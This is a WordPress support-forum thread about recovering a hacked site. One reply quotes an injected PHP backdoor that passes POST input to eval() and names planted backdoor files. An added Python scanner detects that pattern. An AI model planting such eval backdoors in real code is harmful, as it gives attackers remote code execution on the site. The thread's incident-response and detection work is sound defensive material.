Thread Starter
robfaich
(@robinfaichney)
Thanks very much WPyogi. Files index.php and wp-blog-header.php (at least) had been modified so I changed the admin password and reinstalled WP. I’m now looking at what else I should do.
You really need to go through all the articles above – just removing the code may not close any “backdoors” and the hack may well be repeated. Unfortunately, there’s not a quick-fix for hacked sites.
This newish article may also be useful in avoiding future hacking:
http://codex.wordpress.org/Brute_Force_Attacks
Thread Starter
robfaich
(@robinfaichney)
Thanks again, it tests clean now so I feel I can postpone further actions to tomorrow but I’ll do a proper job then.
Robin, we had some similar strange behavior on a client’s site last week and it appears the hackers were somehow able to inject PHP code through a contact form. They had hundreds of strange contact form submissions that on first appearance looked like spam, but what you didn’t see was the hidden code being injected somehow. This piece of code was added to a bunch of standard WP working files.
if (isset($_POST['wp-load'])) {
eval($_POST['wp-load']);
};
The code above could be a chicken-and-egg problem. Not sure if the code above allows the contact form to be used as an attack vector or the contact form was used first to inject this code. I believe the CAPTCHA was also being completely bypassed.
We also found backdoor shell scripts in folders downstream of /wp-includes/js/. I would look through all of these folders for any PHP files that are unique and not part of your normal WordPress installation.
These files below were added; they look like they should be WP files but were unique files not part of the normal WP installation.
wp-apps.php
wp-count.php
wp-var.php
Good luck.
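As an added example (not code posted in this thread), here is a small scanner for the two indicators described above: PHP that passes request input to eval(), and PHP files sitting below wp-includes/js/. The fake install it builds, the file names and the reason labels are constructed for the demo; anything it flags should be compared against a clean copy of the same WordPress version.

```python
"""Added example (not code from the thread): flag the two indicators slickrockweb
describes, PHP that evals request input and PHP files below wp-includes/js/.
The sample install built here is constructed for the demo."""
import os
import re
import tempfile

# eval() whose argument comes from a request superglobal, optionally base64-wrapped.
EVAL_INPUT = re.compile(
    r"\beval\s*\(\s*(?:base64_decode\s*\(\s*)?\$_(?:POST|GET|REQUEST|COOKIE)\b",
    re.IGNORECASE,
)
JS_DIR = "wp-includes/js/"  # per the post: compare any .php found here with a clean install


def scan_wordpress(root):
    """Return sorted (relative path, reasons) for suspicious PHP files under root."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(".php"):
                continue
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            reasons = []
            if rel.startswith(JS_DIR):
                reasons.append("php-under-wp-includes-js")
            with open(full, "r", errors="replace") as fh:
                if EVAL_INPUT.search(fh.read()):
                    reasons.append("eval-of-request-input")
            if reasons:
                findings.append((rel, reasons))
    return sorted(findings)


def build_sample_site():
    """Constructed fake install: a clean file, a backdoored core file, a planted file."""
    root = tempfile.mkdtemp(prefix="wpscan-")
    os.makedirs(os.path.join(root, "wp-includes", "js", "tinymce"))
    files = {
        "index.php": "<?php\nrequire __DIR__ . '/wp-blog-header.php';\n",
        "wp-blog-header.php": "<?php\nif (isset($_POST['wp-load'])) {\n"
                              "    eval($_POST['wp-load']);\n};\n",
        "wp-includes/js/tinymce/wp-var.php": "<?php echo 'planted';\n",
    }
    for rel, body in files.items():
        with open(os.path.join(root, *rel.split("/")), "w") as fh:
            fh.write(body)
    return root
```

Run `scan_wordpress(build_sample_site())` to see the two constructed findings; point `scan_wordpress` at a real document root to scan an actual install.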
Thread Starter
robfaich
(@robinfaichney)
Hi slickrockweb, thanks a lot for taking this trouble. I used FileZilla to do a search on those filenames, which were not found. I’m doing a Sucuri SiteCheck every few hours. I’ve decided if that finds anything I’ll wipe the site clean and start from scratch (following http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/), otherwise I’m keeping my fingers crossed.
Rob